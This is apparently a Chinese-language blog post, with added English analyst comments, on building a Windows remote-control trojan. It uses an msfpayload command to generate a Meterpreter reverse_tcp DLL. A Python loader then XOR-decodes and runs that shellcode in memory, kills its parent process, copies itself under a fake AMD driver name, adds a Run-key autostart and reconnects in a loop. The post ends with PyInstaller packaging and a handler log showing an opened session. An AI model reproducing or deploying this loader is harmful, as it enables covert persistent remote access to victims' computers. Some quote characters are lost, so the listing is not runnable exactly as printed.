
python+msf make windows远控

分析的一个远控样本（Python 加载器 + Metasploit Meterpreter 反向连接），感谢 wstone 的指导。

创建 dll（注：下面是 2014 年时的 msfpayload 写法；msfpayload 已于 2015 年从 Metasploit 中移除，其功能由 msfvenom 取代）

./msfpayload windows/meterpreter/reverse_tcp lhost=192.168.1.123 lport=4444  -t dll X > /tmp/sc.dll

python

main.py

# ---------------------------------------------------------------------------
# Analyst notes.  This is a Python 2 loader (izip, _winreg,
# multiprocessing.forking) for a Metasploit Meterpreter payload, meant to be
# frozen into a single-file executable: the sys._MEIPASS / _MEIPASS2 / _MEI*
# names below are PyInstaller bootloader artifacts.  Comments describe only
# what the listed code does.  As extracted, the page has lost several quote
# characters (flagged inline), so the listing is not runnable exactly as
# printed.
# ---------------------------------------------------------------------------
import sys, os
import shutil
import time
import ctypes
import glob
import multiprocessing
import multiprocessing.forking
from sc import sc                      # payload bytes, see sc.py on this page
from win32file import GetLongPathName  # pywin32
import _winreg
from itertools import izip, cycle
from utils import getppid, kill, get_base_dir   # sibling module, not shown

# Timing (seconds).  Together these set the retry cadence seen in main().
RECONNECT_SLEEP = 60       # pause between successive Worker children
STARTUP_SLEEP = 30         # pause before install() after killing the parent
CHILD_STARTUP_SLEEP = 10   # pause inside each child before the payload runs

# Filesystem artifact: the loader copies itself to <DATA_DIR>\aticlex.exe.
# The names look chosen to resemble a vendor graphics-driver component
# (assumption; nothing on the page states the intent).
METER_NAME = "aticlex.exe"
METER_DIR = "AMD"
USER_DIR = os.path.expanduser("~")

# Prefer %APPDATA%\AMD via the pywin32 shell API; fall back to ~\AMD if the
# import or the call fails for any reason (bare except).
try:
    from win32com.shell import shellcon, shell
    APPDATA_DIR = shell.SHGetFolderPath(0, shellcon.CSIDL_APPDATA, 0, 0)
    DATA_DIR = os.path.join(APPDATA_DIR, METER_DIR)
except:
    DATA_DIR = os.path.join(USER_DIR, METER_DIR)

# Full path of the persisted copy; also the data written to the Run key.
METER_PATH = os.path.join(DATA_DIR, METER_NAME)


class _Popen(multiprocessing.forking.Popen):
    """multiprocessing Popen that passes the frozen bootloader's extraction
    directory to the child.

    While the child is being spawned, ``_MEIPASS2`` is set to ``sys._MEIPASS``
    (presumably so the child bootloader reuses the parent's unpacked
    directory instead of extracting again) and is cleared in ``finally``.
    NOTE(review): ``frozen`` and ``_MEIPASS2`` are unquoted in the listing and
    would be undefined names as printed -- quotes were presumably lost in
    extraction.
    """
    def __init__(self, *args, **kw):
        if hasattr(sys, frozen):
            os.putenv(_MEIPASS2, sys._MEIPASS)
        try:
            super(_Popen, self).__init__(*args, **kw)
        finally:
            if hasattr(sys, frozen):
                os.unsetenv(_MEIPASS2)


class Process(multiprocessing.Process):
    """multiprocessing.Process wired to the _Popen above."""
    _Popen = _Popen


class Worker(Process):
    """Child process that decodes the payload and executes it in-process."""

    def xor(self, data, key=\x41\x82\x99\x73\x12\xf8\x0e\x38):
        # Byte-wise XOR of data with the fixed 8-byte key, cycled over the
        # input.  The key is a static artifact of this sample.
        # NOTE(review): as printed the key literal has no quotes and the join
        # string uses curly quotes (extraction damage); both are syntax errors
        # verbatim.
        return ‘‘.join(chr(ord(c)^ord(k)) for c,k in izip(data, cycle(key)))

    def run(self):
        # Decode the payload, copy it into a ctypes string buffer and call the
        # buffer as a no-argument function returning HRESULT: the
        # create_string_buffer + CFUNCTYPE-cast pattern for running raw code
        # in the current process.  Execution starts in an ordinary data
        # buffer rather than a mapped image section, which is the kind of
        # non-image-memory execution endpoint telemetry can flag.  Nothing
        # here handles a crash or a return; the parent loop in main() simply
        # starts a fresh child afterwards.
        time.sleep(CHILD_STARTUP_SLEEP)
        code = self.xor(sc)
        cbuf = ctypes.create_string_buffer(code)
        func = ctypes.cast(cbuf, ctypes.CFUNCTYPE(ctypes.HRESULT))
        func()


def install():
    """Persist and relocate.

    Registry artifact: under HKCU, key
    SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run, value name ``aticlex``
    (METER_NAME without its extension), data = METER_PATH.  The key is opened
    with KEY_ALL_ACCESS although only a value write follows.

    If this process is not already running from METER_PATH, the running
    executable is copied there (creating DATA_DIR first) and the process image
    is replaced by the copy via os.execve with argv = [METER_PATH] and the
    current environment.  On copy failure the process exits with status 1;
    the Run value has already been written at that point, so a dangling
    autorun entry pointing at a missing file is left behind.  ``e`` is unused.
    """
    reg = _winreg.ConnectRegistry(None, _winreg.HKEY_CURRENT_USER)
    key = _winreg.OpenKey(reg, "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", 0, _winreg.KEY_ALL_ACCESS)
    _winreg.SetValueEx(key, METER_NAME.split(".")[0], 0, _winreg.REG_SZ, METER_PATH)
    # Long-path form of the running binary, presumably so an 8.3 short path
    # compares equal to METER_PATH.
    path = GetLongPathName(sys.executable)
    if path != METER_PATH:
        if not os.path.exists(DATA_DIR):
            os.makedirs(DATA_DIR)
        try:
            shutil.copy(path, METER_PATH)
        except Exception as e:
            sys.exit(1)
        os.execve(METER_PATH, [METER_PATH], os.environ)


def clean():
    """Best-effort removal of stale frozen-bootloader temp directories.

    Globs ``<parent of base_dir>\\_MEI*`` and rmtree's every match except the
    directory this process runs from (excluded by full long path, and by leaf
    name compared case-insensitively).  Every error is swallowed by bare
    ``except`` clauses, so this never fails visibly.  ``get_base_dir`` comes
    from the sibling ``utils`` module, which is not on this page; it is
    presumably the current extraction directory.
    """
    try:
        base_dir = get_base_dir()
        temp_dir = os.path.abspath(os.path.join(base_dir, os.pardir))
        mei = base_dir.split("\\")[-1]
        pattern = "%s\\_MEI*" % temp_dir
        for path in glob.glob(pattern):
            path = GetLongPathName(path)
            if path != base_dir and mei.lower() not in path.lower():
                try:
                    shutil.rmtree(path)
                except:
                    pass
    except:
        pass


def main():
    """Entry point of the frozen binary.

    Order of operations: kill the parent process (``kill``/``getppid`` from
    ``utils``, not shown -- presumably whatever launched this copy), wait
    STARTUP_SLEEP, write persistence and relocate via install() (which may
    replace this process with the copy at METER_PATH; that copy then starts
    this same script from the top), delete stale temp dirs, then loop
    forever: spawn one Worker, wait for it to exit, sleep RECONNECT_SLEEP,
    repeat.  Each payload run is its own child, so a crash there only ends
    that attempt.
    """
    kill(getppid())
    time.sleep(STARTUP_SLEEP)
    install()
    clean()
    while True:
        p = Worker()
        p.daemon = True
        p.start()
        p.join()
        time.sleep(RECONNECT_SLEEP)


if __name__ == "__main__":
    # freeze_support() is the stdlib hook multiprocessing requires in frozen
    # Windows executables before any Process is started.
    multiprocessing.freeze_support()
    main()

sc.py

# Payload bytes as a Python string literal.  The page shows only the first
# two bytes and elides the rest ("........."; the curly quotes are extraction
# damage).  Per the original trailing comment these are the contents of the
# msfpayload output file (/tmp/sc.dll above) read in binary ("rb") mode.
# main.py passes this string through Worker.xor before calling it, so the
# stored bytes are presumably pre-XORed with the same fixed key -- that
# encoding step is not shown on this page.
sc=‘\x12\x34‘ .........# sc = sc.dll open with rb mode

然后用 PyInstaller 打包生成 exe（代码中的 sys._MEIPASS、_MEIPASS2 和 _MEI* 临时目录都是 PyInstaller 的产物）。

  

监听:

msf > use exploit/multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > set lhost 192.168.1.123
lhost => 192.168.1.123
msf exploit(handler) > set lport 4444
lport => 4444
msf exploit(handler) > run
[*] Started reverse handler on 192.168.1.123:4444
[*] Starting the payload handler...
[*] Sending stage (770048 bytes) to 192.168.1.80
[*] Meterpreter session 1 opened (192.168.1.123:4444 -> 192.168.1.80:1138) at 2014-10-22 19:03:43 -0500
meterpreter >

  
